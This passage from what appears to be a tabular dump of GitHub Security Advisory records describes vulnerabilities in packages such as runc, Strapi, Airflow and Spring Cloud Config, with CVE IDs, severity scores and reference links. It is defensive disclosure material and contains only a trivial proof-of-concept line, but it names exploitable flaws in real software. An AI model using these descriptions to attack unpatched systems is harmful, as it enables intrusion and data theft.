| {'CVE-2021-35210'} | 2021-07-01T17:00:04Z | 2021-07-01T17:00:04Z | MODERATE | 6.1 | {'CWE-79'} | {'https://nvd.nist.gov/vuln/detail/CVE-2021-35210', 'https://github.com/contao/contao/security/advisories/GHSA-h58v-c6rf-g9f7', 'https://github.com/advisories/GHSA-h58v-c6rf-g9f7', 'https://contao.org/en/security-advisories/cross-site-scripting-in-the-system-log-2021.html'} | null |
GHSA | GHSA-grvw-q343-58wh | Out-of-bounds write | A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-1138, CVE-2019-1217, CVE-2019-1237, CVE-2019-1298. | {'CVE-2019-1300'} | 2021-03-29T20:55:57Z | 2021-03-29T20:55:57Z | HIGH | 7.5 | {'CWE-787'} | {'https://github.com/chakra-core/ChakraCore/commit/7e9a2ee60baa95ceb4f48f522f823c812ca90c80', 'https://github.com/chakra-core/ChakraCore/commit/95b3e3400afb8fa20743657f3a8057fb451e6f69', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1300', 'https://nvd.nist.gov/vuln/detail/CVE-2019-1300', 'https://github.com/advisories/GHSA-grvw-q343-58wh'} | null |
GHSA | GHSA-4vp3-vfww-8648 | Incorrect permission enforcement in UmbracoCms | Editors/LogViewerController.cs in Umbraco through 8.9.1 allows a user to visit a logviewer endpoint even if they lack Applications.Settings access. | {'CVE-2020-29454'} | 2021-04-13T15:48:05Z | 2021-04-13T15:48:05Z | MODERATE | 4.3 | {'CWE-732'} | {'https://github.com/advisories/GHSA-4vp3-vfww-8648', 'https://nvd.nist.gov/vuln/detail/CVE-2020-29454', 'https://github.com/umbraco/Umbraco-CMS/pull/9361'} | null |
GHSA | GHSA-g86w-v5vg-9gxf | Directory traversal attack in Spring Cloud Config | Spring Cloud Config, versions 2.2.x prior to 2.2.2, versions 2.1.x prior to 2.1.7, and older unsupported versions allow applications to serve arbitrary configuration files through the spring-cloud-config-server module. A malicious user, or attacker, can send a request using a specially crafted URL that can lead a directory traversal attack. | {'CVE-2020-5405'} | 2021-08-25T22:01:26Z | 2020-06-05T16:11:36Z | MODERATE | 6.5 | {'CWE-23', 'CWE-22'} | {'https://github.com/advisories/GHSA-g86w-v5vg-9gxf', 'https://pivotal.io/security/cve-2020-5405', 'https://nvd.nist.gov/vuln/detail/CVE-2020-5405'} | null |
GHSA | GHSA-37hx-4mcq-wc3h | Weak Password Recovery Mechanism for Forgotten Password in Strapi | In Strapi through 3.6.0, the admin panel allows the changing of one's own password without entering the current password. An attacker who gains access to a valid session can use this to take over an account by changing the password. | {'CVE-2021-28128'} | 2021-10-06T17:48:16Z | 2021-10-06T17:48:16Z | HIGH | 8.1 | {'CWE-640'} | {'https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-008.txt', 'https://github.com/advisories/GHSA-37hx-4mcq-wc3h', 'https://github.com/strapi/strapi/releases', 'https://strapi.io/changelog', 'https://nvd.nist.gov/vuln/detail/CVE-2021-28128', 'https://github.com/strapi/strapi/issues/9657'} | null |
GHSA | GHSA-v95c-p5hm-xq8f | Overflow in netlink bytemsg length field allows attacker to override netlink-based container configuration | ### Impact
In runc, [netlink](https://www.man7.org/linux/man-pages/man7/netlink.7.html) is used internally as a serialization system for specifying the relevant container configuration to the C portion of our code (responsible for the based namespace setup of containers). In all versions of runc prior to 1.0.3, the encoder did not handle the possibility of an integer overflow in the 16-bit length field for the byte array attribute type, meaning that a large enough malicious byte array attribute could result in the length overflowing and the attribute contents being parsed as netlink messages for container configuration.
This vulnerability requires the attacker to have some control over the configuration of the container and would allow the attacker to bypass the namespace restrictions of the container by simply adding their own netlink payload which disables all namespaces.
Prior to 9c444070ec7bb83995dbc0185da68284da71c554, in practice it was fairly difficult to specify an arbitrary-length netlink message with most container runtimes. The only user-controlled byte array was the namespace paths attributes which can be specified in runc's `config.json`, but as far as we can tell no container runtime gives raw access to that configuration setting -- and having raw access to that setting **would allow the attacker to disable namespace protections entirely anyway** (setting them to `/proc/1/ns/...` for instance). In addition, each namespace path is limited to 4096 bytes (with only 7 namespaces supported by runc at the moment) meaning that even with custom namespace paths it appears an attacker still cannot shove enough bytes into the netlink bytemsg in order to overflow the uint16 counter.
However, out of an abundance of caution (given how old this bug is) we decided to treat it as a potentially exploitable vulnerability with a low severity. After 9c444070ec7bb83995dbc0185da68284da71c554 (which was not present in any release of runc prior to the discovery of this bug), all mount paths are included as a giant netlink message which means that this bug becomes significantly more exploitable in more reasonable threat scenarios.
The main users impacted are those who allow untrusted images with untrusted configurations to run on their machines (such as with shared cloud infrastructure), though as mentioned above it appears this bug was not practically exploitable on any released version of runc to date.
### Patches
The patch for this is d72d057ba794164c3cce9451a00b72a78b25e1ae and runc 1.0.3 was released with this bug fixed.
### Workarounds
To the extent this is exploitable, disallowing untrusted namespace paths in container configuration should eliminate all practical ways of exploiting this bug. It should be noted that untrusted namespace paths would allow the attacker to disable namespace protections entirely even in the absence of this bug.
### References
* commit d72d057ba794 ("runc init: avoid netlink message length overflows")
* https://bugs.chromium.org/p/project-zero/issues/detail?id=2241
### Credits
Thanks to Felix Wilhelm from Google Project Zero for discovering and reporting this vulnerability. In particular, the fact they found this vulnerability so quickly, before we made a 1.1 release of runc (which would've been vulnerable) was quite impressive.
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [our repo](https://github.com/opencontainers/runc)
| {'CVE-2021-43784'} | 2022-04-19T19:03:16Z | 2021-12-07T21:22:39Z | MODERATE | 6 | {'CWE-190'} | {'https://github.com/opencontainers/runc/commit/f50369af4b571e358f20b139eea52d612eb55eed', 'https://lists.debian.org/debian-lts-announce/2021/12/msg00005.html', 'https://github.com/opencontainers/runc/commit/9c444070ec7bb83995dbc0185da68284da71c554', 'https://github.com/advisories/GHSA-v95c-p5hm-xq8f', 'https://github.com/opencontainers/runc/security/advisories/GHSA-v95c-p5hm-xq8f', 'https://nvd.nist.gov/vuln/detail/CVE-2021-43784', 'https://github.com/opencontainers/runc/commit/d72d057ba794164c3cce9451a00b72a78b25e1ae', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=2241'} | null |
GHSA | GHSA-gmrf-99gw-vvwj | /user/sessions endpoint allows detecting valid accounts | This Security Advisory is about a vulnerability in eZ Platform v1.13, v2.5, and v3.2, and in Ibexa DXP and Ibexa Open Source v3.3. The /user/sessions endpoint can let an attacker detect if a given username or email refers to a valid account. This can be detected through differences in the response data or response time of certain requests. The fix ensures neither attack is possible. The fix is distributed via Composer.
If you come across a security issue in our products, here is how you can report it to us: https://doc.ibexa.co/en/latest/guide/reporting_issues/#toc | null | 2021-03-11T17:42:08Z | 2021-03-11T17:42:08Z | HIGH | 0 | {'CWE-203'} | {'https://github.com/ezsystems/ezpublish-kernel/commit/b496f073c3f03707d3531a6941dc098b84e3cbed', 'https://github.com/ezsystems/ezpublish-kernel/security/advisories/GHSA-gmrf-99gw-vvwj', 'https://github.com/advisories/GHSA-gmrf-99gw-vvwj', 'https://packagist.org/packages/ezsystems/ezpublish-kernel'} | null |
GHSA | GHSA-6m4r-m3gc-h4r5 | OS Command Injection in install-package | install-package through 0.4.0 is vulnerable to Command Injection. It allows execution of arbitrary commands via the options argument. | {'CVE-2020-7629'} | 2022-02-10T23:48:06Z | 2022-02-10T23:48:06Z | CRITICAL | 9.8 | {'CWE-78'} | {'https://github.com/1000ch/install-package/blob/master/index.js#L82,', 'https://github.com/advisories/GHSA-6m4r-m3gc-h4r5', 'https://nvd.nist.gov/vuln/detail/CVE-2020-7629', 'https://snyk.io/vuln/SNYK-JS-INSTALLPACKAGE-564267'} | null |
GHSA | GHSA-3p92-886g-qxpq | Remote Memory Exposure in floody | Versions of `floody` before 0.1.1 are vulnerable to remote memory exposure.
.write(number)` in the affected `floody` versions passes a number to Buffer constructor, appending a chunk of uninitialized memory.
Proof of Concept:
```
var f = require('floody')(process.stdout);
f.write(USERSUPPLIEDINPUT);
'f.stop();
## Recommendation
Update to version 0.1.1 or later. | null | 2021-08-04T21:27:04Z | 2019-06-04T15:42:32Z | MODERATE | 5.1 | {'CWE-201'} | {'https://www.npmjs.com/advisories/601', 'https://snyk.io/vuln/npm:floody:20160115', 'https://github.com/soldair/node-floody/commit/6c44722312131f4ac8a1af40f0f861c85efe01b0', 'https://github.com/advisories/GHSA-3p92-886g-qxpq'} | null |
GHSA | GHSA-f98m-q3hr-p5wq | Prototype Pollution in locutus | All versions of package locutus prior to version 2.0.12 are vulnerable to Prototype Pollution via the php.strings.parse_str function. | {'CVE-2020-7719'} | 2021-12-14T15:33:30Z | 2021-05-06T18:12:22Z | CRITICAL | 9.8 | {'CWE-20', 'CWE-915'} | {'https://snyk.io/vuln/SNYK-JS-LOCUTUS-598675', 'https://github.com/kvz/locutus/pull/418/', 'https://github.com/advisories/GHSA-f98m-q3hr-p5wq', 'https://nvd.nist.gov/vuln/detail/CVE-2020-7719', 'https://github.com/locutusjs/locutus/commit/0eb16d8541838e80f3c2340a9ef93ded7c97290f'} | null |
GHSA | GHSA-xwjh-cp99-cj8q | Path Traversal in cordova-plugin-ionic-webview | Versions of `cordova-plugin-ionic-webview` prior to 2.2.0 are vulnerable to Path Traversal, allowing attackers access to OS local files that should be inaccessible by third-party applications. The package launches a webserver listening on http://localhost:8080 without restricting access of the app itself, thus escaping the iOS application sandbox and accessing local files.
## Recommendation
Upgrade to version 2.2.0 | {'CVE-2018-16202'} | 2021-09-22T18:20:58Z | 2019-02-12T15:36:35Z | HIGH | 8.6 | {'CWE-22'} | {'http://jvn.jp/en/jp/JVN60497148/index.html', 'https://github.com/ionic-team/cordova-plugin-ionic-webview', 'https://nvd.nist.gov/vuln/detail/CVE-2018-16202', 'https://github.com/advisories/GHSA-xwjh-cp99-cj8q', 'https://jvn.jp/en/jp/JVN69812763/index.html', 'https://www.npmjs.com/advisories/746'} | null |
GHSA | GHSA-pvx3-gm3c-gmpr | Denial of Service in Go-Ethereum | A design flaw in Go-Ethereum 1.10.12 and older versions allows an attacker node to send 5120 future transactions with a high gas price in one message, which can purge all of pending transactions in a victim node's memory pool, causing a denial of service (DoS). | {'CVE-2022-23327'} | 2022-03-18T20:06:44Z | 2022-03-05T00:00:46Z | HIGH | 7.5 | null | {'https://github.com/advisories/GHSA-pvx3-gm3c-gmpr', 'http://ethereum.com', 'https://tristartom.github.io/docs/ccs21.pdf', 'https://nvd.nist.gov/vuln/detail/CVE-2022-23327', 'http://go-ethereum.com', 'https://dl.acm.org/doi/pdf/10.1145/3460120.3485369'} | null |
GHSA | GHSA-9vg3-cf92-h2h7 | Insufficient Verification of Data Authenticity in python-keystoneclient | python-keystoneclient version 0.2.3 to 0.2.5 has middleware memcache signing bypass | {'CVE-2013-2167'} | 2022-03-23T19:48:28Z | 2020-03-10T20:39:05Z | CRITICAL | 9.8 | {'CWE-345'} | {'https://security-tracker.debian.org/tracker/CVE-2013-2167', 'http://www.securityfocus.com/bid/60680', 'http://rhn.redhat.com/errata/RHSA-2013-0992.html', 'https://nvd.nist.gov/vuln/detail/CVE-2013-2167', 'https://github.com/advisories/GHSA-9vg3-cf92-h2h7', 'https://github.com/openstack/python-keystoneclient/commits/0.3.0', 'https://bugs.gentoo.org/show_bug.cgi?id=CVE-2013-2167', 'https://access.redhat.com/security/cve/cve-2013-2167', 'http://www.openwall.com/lists/oss-security/2013/06/19/5', 'https://github.com/openstack/python-keystoneclient/commit/eeefb784f24c37d5f56a421e1ccc911cace9385e', 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-2167', 'http://lists.fedoraproject.org/pipermail/package-announce/2013-August/113944.html', 'https://exchange.xforce.ibmcloud.com/vulnerabilities/85492'} | null |
GHSA | GHSA-86vp-x3pr-79rx | Cross-site scripting in Apache airflow | The "origin" parameter passed to some of the endpoints like '/trigger' was vulnerable to XSS exploit. This issue affects Apache Airflow versions prior to 1.10.14. This is same as CVE-2020-13944 but the implemented fix in Airflow 1.10.13 did not fix the issue completely. | {'CVE-2020-17515'} | 2021-05-06T15:08:53Z | 2021-04-20T16:40:14Z | MODERATE | 6.1 | {'CWE-79'} | {'https://lists.apache.org/thread.html/ra8ce70088ba291f358e077cafdb14d174b7a1ce9a9d86d1b332d6367@%3Cusers.airflow.apache.org%3E', 'https://github.com/apache/airflow/pull/14738', 'http://www.openwall.com/lists/oss-security/2020/12/11/2', 'https://pypi.org/project/apache-airflow', 'https://lists.apache.org/thread.html/r2892ef594dbbf54d0939b808626f52f7c2d1584f8aa1d81570847d2a@%3Cusers.airflow.apache.org%3E', 'https://lists.apache.org/thread.html/r2892ef594dbbf54d0939b808626f52f7c2d1584f8aa1d81570847d2a@%3Cannounce.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2020-17515', 'http://www.openwall.com/lists/oss-security/2021/05/01/2', 'https://lists.apache.org/thread.html/r4656959c8ed06c1f6202d89aa4e67b35ad7bdba5a666caff3fea888e@%3Cusers.airflow.apache.org%3E', 'https://github.com/apache/airflow/commit/409c249121bd9c8902fc2ba551b21873ab41f953', 'https://github.com/apache/airflow/releases/tag/2.0.2', 'https://lists.apache.org/thread.html/rc005f4de9d9b0ba943ceb8ff5a21a5c6ff8a9df52632476698d99432@%3Cannounce.apache.org%3E', 'https://github.com/apache/airflow/releases/tag/1.10.15', 'https://github.com/advisories/GHSA-86vp-x3pr-79rx', 'https://lists.apache.org/thread.html/r4656959c8ed06c1f6202d89aa4e67b35ad7bdba5a666caff3fea888e%40%3Cusers.airflow.apache.org%3E', 'https://lists.apache.org/thread.html/r2892ef594dbbf54d0939b808626f52f7c2d1584f8aa1d81570847d2a@%3Cdev.airflow.apache.org%3E'} | null |
GHSA | GHSA-4w97-57v2-3w44 | False-negative validation results in MINT transactions with invalid baton | ### Impact
Users could experience false-negative validation outcomes for [MINT](https://github.com/simpleledger/slp-specifications/blob/master/slp-token-type-1.md#mint---extended-minting-transaction) transaction operations. A poorly implemented SLP wallet could allow spending of the affected tokens which would result in the destruction of a user's minting baton.
### Patches
npm package [slp-validate](https://www.npmjs.com/package/slp-validate) has been patched and published as version 1.2.1.
### Workarounds
Upgrade to slp-validate 1.2.1.
### References
* slp-validate [commit](https://github.com/simpleledger/slp-validate/commit/cde95c0c6470dceb4f023cd462f904135ebd73e7)
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [slp-validate](https://github.com/simpleledger/slp-validate/issues) | {'CVE-2020-11072'} | 2021-01-08T20:17:37Z | 2020-05-12T00:45:24Z | CRITICAL | 8.6 | {'CWE-697'} | {'https://github.com/simpleledger/slp-validate.js/security/advisories/GHSA-4w97-57v2-3w44', 'https://github.com/advisories/GHSA-4w97-57v2-3w44', 'https://github.com/simpleledger/slp-validate/security/advisories/GHSA-4w97-57v2-3w44', 'https://github.com/simpleledger/slp-validate/commit/cde95c0c6470dceb4f023cd462f904135ebd73e7', 'https://nvd.nist.gov/vuln/detail/CVE-2020-11072'} | null |
GHSA | GHSA-6268-v434-45m5 | Cross-site Scripting in Grav | Grav through 1.6.15 allows (Stored) Cross-Site Scripting due to JavaScript execution in SVG images. | {'CVE-2019-16126'} | 2021-08-17T22:39:50Z | 2019-11-08T20:06:08Z | MODERATE | 6.1 | {'CWE-79'} | {'https://github.com/advisories/GHSA-6268-v434-45m5', 'https://nvd.nist.gov/vuln/detail/CVE-2019-16126', 'https://github.com/getgrav/grav/issues/2657'} | null |
GHSA | GHSA-9c29-9h4m-wg5p | Users can view database names in Apache Superset | In Apache Incubator Superset before 0.32, a user can view database names that he has no access to on a dropdown list in SQLLab | {'CVE-2019-12414'} | 2021-08-19T19:25:35Z | 2020-02-26T19:55:14Z | MODERATE | 5.3 | {'CWE-200'} | {'https://lists.apache.org/thread.html/396034aabe08dd349ff44eb062c718aadcf1b4e86f6372c7d5e988c0%40%3Cdev.superset.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2019-12414', 'https://github.com/advisories/GHSA-9c29-9h4m-wg5p'} | null |
GHSA | GHSA-22cm-3qf2-2wc7 | LDAP Injection in is-user-valid | All versions of package is-user-valid are vulnerable to LDAP Injection which can lead to either authentication bypass or information exposure. | {'CVE-2021-23335'} | 2021-04-13T15:30:27Z | 2021-04-13T15:30:27Z | HIGH | 7.5 | {'CWE-74', 'CWE-90'} | {'https://snyk.io/vuln/SNYK-JS-ISUSERVALID-1056766', 'https://github.com/advisories/GHSA-22cm-3qf2-2wc7', 'https://nvd.nist.gov/vuln/detail/CVE-2021-23335'} | null |
GHSA | GHSA-xwgq-pcqx-hpmv | URL Redirection to Untrusted Site (Open Redirect) in Ktor | In Ktor through 1.2.6, the client resends data from the HTTP Authorization header to a redirect location. | {'CVE-2019-19703'} | 2021-08-19T16:56:46Z | 2020-02-12T18:45:50Z | MODERATE | 6.1 | {'CWE-601'} | {'https://github.com/ktorio/ktor/issues/1467', 'https://nvd.nist.gov/vuln/detail/CVE-2019-19703', 'https://github.com/advisories/GHSA-xwgq-pcqx-hpmv', 'https://github.com/ktorio/ktor/commit/0c108156f45423d09014b47be810188629cb878f'} | null |
GHSA | GHSA-gwrj-88fp-5m36 | Code injection in Narou | Narou (aka Narou.rb) before 3.8.0 allows Ruby Code Injection via the title name or author name of a novel. | {'CVE-2021-35514'} | 2021-07-02T18:36:01Z | 2021-07-02T18:36:01Z | HIGH | 8.5 | {'CWE-94'} | {'https://vuln.ryotak.me/advisories/51', 'https://github.com/whiteleaf7/narou/commit/d07720e855293182563b749431dfbf6c2d1cdb42', 'https://nvd.nist.gov/vuln/detail/CVE-2021-35514', 'https://github.com/advisories/GHSA-gwrj-88fp-5m36', 'https://github.com/whiteleaf7/narou/blob/develop/ChangeLog.md#380-20210627'} | null |
GHSA | GHSA-6m9g-jr8c-cqw3 | Depth counting error in guard() leading to multiple potential security issues in aioxmpp | ### Impact
Possible remote Denial of Service or Data Injection.
### Patches
Patches are available in https://github.com/horazont/aioxmpp/pull/268. They have been backported to the 0.10 release series and 0.10.3 is the first release to contain the fix.
### Workarounds
To make the bug exploitable, an error suppressing ``xso_error_handler`` is required. By not using ``xso_error_handlers`` or not using the suppression function, the vulnerability can be mitigated completely (to our knowledge).
### References
The pull request contains a detailed description: https://github.com/horazont/aioxmpp/pull/268
### For more information
If you have any questions or comments about this advisory:
* [Join our chat](xmpp:aioxmpp@conference.zombofant.net?join)
* Email the maintainer [Jonas Schäfer](mailto:jonas@wielicki.name) | {'CVE-2019-1000007'} | 2021-07-26T23:48:58Z | 2020-04-29T17:12:39Z | HIGH | 7.4 | {'CWE-237'} | {'https://github.com/horazont/aioxmpp/pull/268', 'https://nvd.nist.gov/vuln/detail/CVE-2019-1000007', 'https://github.com/advisories/GHSA-6m9g-jr8c-cqw3', 'https://github.com/horazont/aioxmpp/commit/29ff0838a40f58efe30a4bbcea95aa8dab7da475', 'https://github.com/horazont/aioxmpp/commit/f151f920f439d97d4103fc11057ed6dc34fe98be', 'https://github.com/horazont/aioxmpp/security/advisories/GHSA-6m9g-jr8c-cqw3'} | null |
GHSA | GHSA-jc83-cpf9-q7c6 | False-negative validation results in MINT transactions with invalid baton | ### Impact
Users could experience false-negative validation outcomes for [MINT](https://github.com/simpleledger/slp-specifications/blob/master/slp-token-type-1.md#mint---extended-minting-transaction) transaction operations. A poorly implemented SLP wallet could allow spending of the affected tokens which would result in the destruction of a user's minting baton.
### Patches
npm package [slpjs](https://www.npmjs.com/package/slpjs) has been patched and published as version 0.27.2.
### Workarounds
Upgrade to slpjs 0.27.2.
### References
* slpjs [commit](https://github.com/simpleledger/slpjs/commit/3671be2ffb6d4cfa94c00c6dc8649d1ba1d75754)
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [slp-validate](https://github.com/simpleledger/slp-validate/issues) or [slpjs](https://github.com/simpleledger/slpjs/issues) | {'CVE-2020-11071'} | 2021-01-08T20:17:32Z | 2020-05-12T00:39:03Z | CRITICAL | 8.6 | {'CWE-697'} | {'https://nvd.nist.gov/vuln/detail/CVE-2020-11071', 'https://github.com/simpleledger/slpjs/commit/3671be2ffb6d4cfa94c00c6dc8649d1ba1d75754', 'https://github.com/simpleledger/slpjs/security/advisories/GHSA-jc83-cpf9-q7c6', 'https://github.com/advisories/GHSA-jc83-cpf9-q7c6'} | null |
GHSA | GHSA-4936-rj25-6wm6 | High severity vulnerability that affects nori | The nori gem 2.0.x before 2.0.2, 1.1.x before 1.1.4, and 1.0.x before 1.0.3 for Ruby does not properly restrict casts of string values, which allows remote attackers to conduct object-injection attacks and execute arbitrary code, or cause a denial of service (memory and CPU consumption) involving nested XML entity references, by leveraging Action Pack support for (1) YAML type conversion or (2) Symbol type conversion, a similar vulnerability to CVE-2013-0156. | {'CVE-2013-0285'} | 2021-08-31T21:49:15Z | 2017-10-24T18:33:37Z | HIGH | 0 | {'CWE-20'} | {'https://nvd.nist.gov/vuln/detail/CVE-2013-0285', 'http://seclists.org/oss-sec/2013/q1/304', 'https://support.cloud.engineyard.com/entries/22915701-january-14-2013-security-vulnerabilities-httparty-extlib-crack-nori-update-these-gems-immediately', 'https://github.com/advisories/GHSA-4936-rj25-6wm6'} | null |
GHSA | GHSA-6xv6-jpvw-cx6q | Command injection in bestzip | The package bestzip before 2.1.7 are vulnerable to Command Injection via the options param. | {'CVE-2020-7730'} | 2021-07-29T22:26:00Z | 2021-05-06T18:27:36Z | CRITICAL | 9.8 | {'CWE-78'} | {'https://snyk.io/vuln/SNYK-JS-BESTZIP-609371', 'https://nvd.nist.gov/vuln/detail/CVE-2020-7730', 'https://github.com/nfriedly/node-bestzip/commit/45d4a901478c6a8f396c8b959dd6cf8fd3f955b6', 'https://github.com/advisories/GHSA-6xv6-jpvw-cx6q'} | null |
GHSA | GHSA-8rx6-v5q4-xw3j | XML External Entity Reference in Jenkins Coverage/Complexity Scatter Plot Plugin | Jenkins Coverage/Complexity Scatter Plot Plugin 1.1.1 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks. | {'CVE-2022-28154'} | 2022-04-12T21:58:25Z | 2022-03-30T00:00:23Z | HIGH | 8.1 | {'CWE-611'} | {'https://www.jenkins.io/security/advisory/2022-03-29/#SECURITY-1899', 'https://nvd.nist.gov/vuln/detail/CVE-2022-28154', 'https://github.com/advisories/GHSA-8rx6-v5q4-xw3j', 'http://www.openwall.com/lists/oss-security/2022/03/29/1'} | null |
GHSA | GHSA-rcj2-vvjx-87pm | Missing Encryption of Sensitive Data in arrow-kt Arrow | arrow-kt Arrow before 0.9.0 resolved Gradle build artifacts (for compiling and building the published JARs) over HTTP instead of HTTPS. Any of these dependent artifacts could have been maliciously compromised by an MITM attack. | {'CVE-2019-11404'} | 2021-05-11T14:57:29Z | 2019-04-22T17:15:40Z | MODERATE | 5.9 | {'CWE-311'} | {'https://github.com/arrow-kt/arrow/issues/1310', 'https://github.com/arrow-kt/ank/issues/35', 'https://github.com/advisories/GHSA-rcj2-vvjx-87pm', 'https://github.com/arrow-kt/arrow/releases/tag/0.9.0', 'https://github.com/arrow-kt/ank/pull/36', 'https://nvd.nist.gov/vuln/detail/CVE-2019-11404', 'https://github.com/arrow-kt/arrow/commit/74198dab522393487d5344f194dc21208ab71ae8'} | null |
GHSA | GHSA-6hgm-866r-3cjv | Insecure Deserialization in Apache Commons Collection | Serialized-object interfaces in Java applications using the Apache Commons Collections (ACC) library may allow remote attackers to execute arbitrary commands via a crafted serialized Java object. | {'CVE-2015-6420'} | 2020-06-15T20:36:20Z | 2020-06-15T20:36:20Z | HIGH | 0 | null | {'https://www.kb.cert.org/vuls/id/581311', 'http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20151209-java-deserialization', 'https://github.com/advisories/GHSA-6hgm-866r-3cjv', 'https://nvd.nist.gov/vuln/detail/CVE-2015-6420', 'https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05376917', 'http://www.securityfocus.com/bid/78872', 'https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05390722', 'http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html', 'https://www.tenable.com/security/research/tra-2017-23', 'https://www.tenable.com/security/research/tra-2017-14'} | null |
GHSA | GHSA-r6cm-wg48-rh2r | Exposure of Private Personal Information to an Unauthorized Actor in alextselegidis/easyappointments | The software is a booking management system that has a public form to place bookings, and a private area for the calendar and management of services, users, settings, etc. There is a backend API that allows data manipulation, including listing the appointments for a specific time range. This happens on this endpoint: /index.php/backend_api/ajax_get_calendar_events Unfortunately, there is no authentication / permissions-check on that endpoint, the only required parameters in a POST request are "startDate", "endDate" and "csrfToken". Because the csrfToken can be obtained by any unauthenticated user just visiting the public form (and is valid for the backend as well), any attacker can query the backend API and obtain all sorts of private information about the appointment, in JSON format. | {'CVE-2022-0482'} | 2022-04-17T17:13:16Z | 2022-03-10T00:00:40Z | CRITICAL | 9.1 | {'CWE-863', 'CWE-359'} | {'http://packetstormsecurity.com/files/166701/Easy-Appointments-Information-Disclosure.html', 'https://github.com/alextselegidis/easyappointments/commit/44af526a6fc5e898bc1e0132b2af9eb3a9b2c466', 'https://github.com/alextselegidis/easyappointments/releases/tag/1.4.3', 'https://opencirt.com/hacking/securing-easy-appointments-cve-2022-0482/', 'https://nvd.nist.gov/vuln/detail/CVE-2022-0482', 'https://github.com/advisories/GHSA-r6cm-wg48-rh2r', 'https://huntr.dev/bounties/2fe771ef-b615-45ef-9b4d-625978042e26'} | null |
GHSA | GHSA-92v9-xh2q-fq9f | Prototype Pollution in @cookiex/deep | The npm @cookiex/deep package before version 0.0.7 has a prototype pollution vulnerability. The global proto object can be polluted using the __proto__ object. | {'CVE-2021-23442'} | 2021-09-29T18:06:08Z | 2021-09-20T20:12:38Z | HIGH | 8.6 | {'CWE-1321', 'CWE-915'} | {'https://github.com/tony-tsx/cookiex-deep/issues/1', 'https://github.com/tony-tsx/cookiex-deep/commit/b5bea2b7f34a5fa9abb4446cbd038ecdbcd09c88', 'https://nvd.nist.gov/vuln/detail/CVE-2021-23442', 'https://snyk.io/vuln/SNYK-JS-COOKIEXDEEP-1582793', 'https://github.com/advisories/GHSA-92v9-xh2q-fq9f'} | null |
GHSA | GHSA-m884-279h-32v2 | Exceptions displayed in non-debug configurations in Symfony | Description
-----------
When `ErrorHandler` renders an exception HTML page, it uses un-escaped properties from the related Exception class to render the stacktrace. The security issue comes from the fact that the stacktraces were also displayed in non-`debug` environments.
Resolution
----------
The `ErrorHandler` class now escapes all properties coming from the related Exception, and the stacktrace is not displayed anymore in non-`debug` environments.
The patches for this issue are available [here](https://github.com/symfony/symfony/commit/cf80224589ac05402d4f72f5ddf80900ec94d5ad) and [here](https://github.com/symfony/symfony/commit/629d21b800a15dc649fb0ae9ed7cd9211e7e45db) for branch 4.4.
Credits
-------
I would like to thank Luka Sikic for reporting & Yonel Ceruto and Jérémy Derussé for fixing the issue. | {'CVE-2020-5274'} | 2022-04-19T19:02:57Z | 2020-03-30T20:09:31Z | MODERATE | 4.6 | {'CWE-209'} | {'https://github.com/symfony/symfony/commit/cf80224589ac05402d4f72f5ddf80900ec94d5ad', 'https://nvd.nist.gov/vuln/detail/CVE-2020-5274', 'https://github.com/symfony/symfony/security/advisories/GHSA-m884-279h-32v2', 'https://github.com/symfony/symfony/commit/629d21b800a15dc649fb0ae9ed7cd9211e7e45db', 'https://github.com/advisories/GHSA-m884-279h-32v2'} | null |
GHSA | GHSA-39cx-xcwj-3rc4 | Cross-Site Scripting in dojo | Affected versions of `dojo` are susceptible to a cross-site scripting vulnerability in the `dijit.Editor` and `textarea` components, which execute their contents as Javascript, even when sanitized.
## Recommendation
Update to version 1.1 or later. | {'CVE-2008-6681'} | 2021-09-23T21:27:05Z | 2020-09-01T15:25:29Z | MODERATE | 0 | {'CWE-79'} | {'https://github.com/advisories/GHSA-39cx-xcwj-3rc4', 'https://www.npmjs.com/advisories/107', 'https://nvd.nist.gov/vuln/detail/CVE-2008-6681', 'http://trac.dojotoolkit.org/ticket/2140', 'http://www.securityfocus.com/bid/34661', 'https://bugs.dojotoolkit.org/ticket/2140', 'https://exchange.xforce.ibmcloud.com/vulnerabilities/49883', 'http://www.dojotoolkit.org/book/dojo-1-1-release-notes'} | null |
GHSA | GHSA-wrr7-33fx-rcvj | Deserialization of Untrusted Data in jackson-databind | **Withdrawn:** Duplicate of GHSA-cjjf-94ff-43w7 | {'CVE-2018-12022'} | 2020-06-16T20:28:16Z | 2020-06-15T18:44:56Z | HIGH | 0 | null | {'https://www.debian.org/security/2019/dsa-4452', 'https://lists.apache.org/thread.html/7fcf88aff0d1deaa5c3c7be8d58c05ad7ad5da94b59065d8e7c50c5d@%3Cissues.lucene.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2018-12022', 'https://github.com/FasterXML/jackson-databind/commit/28badf7ef60ac3e7ef151cd8e8ec010b8479226a', 'https://access.redhat.com/errata/RHSA-2019:2804', 'https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E', 'https://access.redhat.com/errata/RHBA-2019:0959', 'https://seclists.org/bugtraq/2019/May/68', 'https://access.redhat.com/errata/RHSA-2019:4037', 'https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html', 'https://access.redhat.com/errata/RHSA-2019:0782', 'https://access.redhat.com/errata/RHSA-2019:1107', 'http://www.securityfocus.com/bid/107585', 'https://access.redhat.com/errata/RHSA-2019:1140', 'https://access.redhat.com/errata/RHSA-2019:3892', 'https://github.com/advisories/GHSA-wrr7-33fx-rcvj', 'https://access.redhat.com/errata/RHSA-2019:1108', 